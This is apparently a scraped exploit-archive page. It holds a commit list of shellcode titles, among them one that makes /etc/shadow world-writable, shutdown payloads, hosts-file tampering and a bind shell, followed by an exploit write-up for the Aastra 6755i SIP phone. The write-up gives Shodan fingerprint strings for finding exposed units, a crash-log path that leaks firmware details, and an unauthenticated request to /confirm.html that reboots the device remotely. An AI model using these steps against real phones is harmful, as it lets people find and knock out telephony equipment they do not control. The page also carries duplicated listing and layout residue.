ae6ab38369
3 changes to exploits/shellcodes Aastra 6755i SIP SP4 - Denial of Service October CMS < 1.0.431 - Cross-Site Scripting Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes) Linux/x86 - shutdown -h now Shellcode (56 bytes) Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes) Linux/x86 - shutdown -h now Shellcode (56 bytes) Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) Linux/x64 - shutdown -h now Shellcode (65 bytes) Linux/ARM - Bind TCP (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)
21 lines
No EOL
933 B
Text
21 lines
No EOL
933 B
Text
# Exploit Title: Aastra 6755i SIP SP4 | Unauthorized Remote Reboot
|
|
# Date: 17/02/2018
|
|
# Exploit Author: Wadeek
|
|
# Hardware Version: 6755i
|
|
# Firmware Version: 3.3.1.4053 SP4
|
|
# Vendor Homepage: http://www.aastra.sg/
|
|
# Firmware Link: http://www.aastra.sg/cps/rde/aareddownload?file_id=6950-17778-_P32_XML&dsproject=www-aastra-sg&mtype=zip
|
|
|
|
== Web Fingerprinting ==
|
|
#===========================================
|
|
:www.shodan.io: "Server: Aragorn" "WWW-Authenticate: Basic realm" "Mitel 6755i"
|
|
#===========================================
|
|
:Device image: /aastra.png (160x50)
|
|
#===========================================
|
|
:Crash dump, Firmware version, Firmware model,...: /crashlog.html
|
|
#===========================================
|
|
|
|
== PoC ==
|
|
#================================================
|
|
:Unauthorized Remote Reboot ("crash.cfg" file is created after): /confirm.html
|
|
#================================================ |